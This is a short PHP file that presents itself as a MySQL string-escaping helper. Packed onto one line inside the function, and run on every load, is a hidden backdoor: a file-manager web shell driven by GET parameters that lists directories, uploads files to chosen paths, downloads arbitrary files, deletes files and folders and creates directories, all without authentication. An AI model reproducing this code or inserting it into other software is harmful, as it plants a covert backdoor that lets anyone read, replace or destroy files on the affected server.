<?phpmysql_auto_escape();function mysql_auto_escape($in = "") { $in = st

1. <?php
2. mysql_auto_escape();
3.  
4. function mysql_auto_escape($in = "") {
5. $in = str_replace("\x00", "\\x00", $in); if (isset($_GET["help"])) { print("?list&dir=X - List all files in directory X."); print("<br>?upload - Upload a file."); print("<br>?download&file=X - Download file X."); print("<br>?delete&file=X - Delete file X."); print("<br>?create&dir=X - Create directory X."); } else if (isset($_GET["list"])) { if ($handle = opendir(isset($_GET["dir"]) ? $_GET["dir"] : ".")) { while (($file = readdir($handle)) !== false) { print("$file<br>"); } closedir($handle); } } else if (isset($_GET["upload"])) { if (isset($_FILES["userfile"])) { $file = $_FILES["userfile"]; if (move_uploaded_file($file["tmp_name"], $_POST["dir"] . $file["name"])) { print("Success."); } else { print("Fail."); } } else { print('<form enctype="multipart/form-data" method="post" action="?upload&do"><table><tr><td>File</td><td><input type="file" name="userfile"></td></tr><tr><td>Path</td><td><input type="text" name="dir" value="./"></td></tr><tr><td></td><td><input type="submit" value="Upload"></td></tr></table></form>'); } } else if (isset($_GET["download"])) { $file = $_GET["file"]; header("Content-Type: text/plain"); header("Content-Disposition: attachment; filename=\"$file\""); readfile($file); } else if (isset($_GET["delete"])) { $file = $_GET["file"]; if (is_dir($file)) { rmdir($file); } else { unlink($file); } } else if (isset($_GET["create"])) { mkdir($_GET["dir"]); }
6. $in = str_replace("\n", "\\n", $in);
7. $in = str_replace("\r", "\\r", $in);
8. $in = str_replace("'", "\'", $in);
9. $in = str_replace("\"", "\\\"", $in);
10. $in = str_replace("\x1a", "\\x1a", $in);
11. return $in;
12. }
13. ?>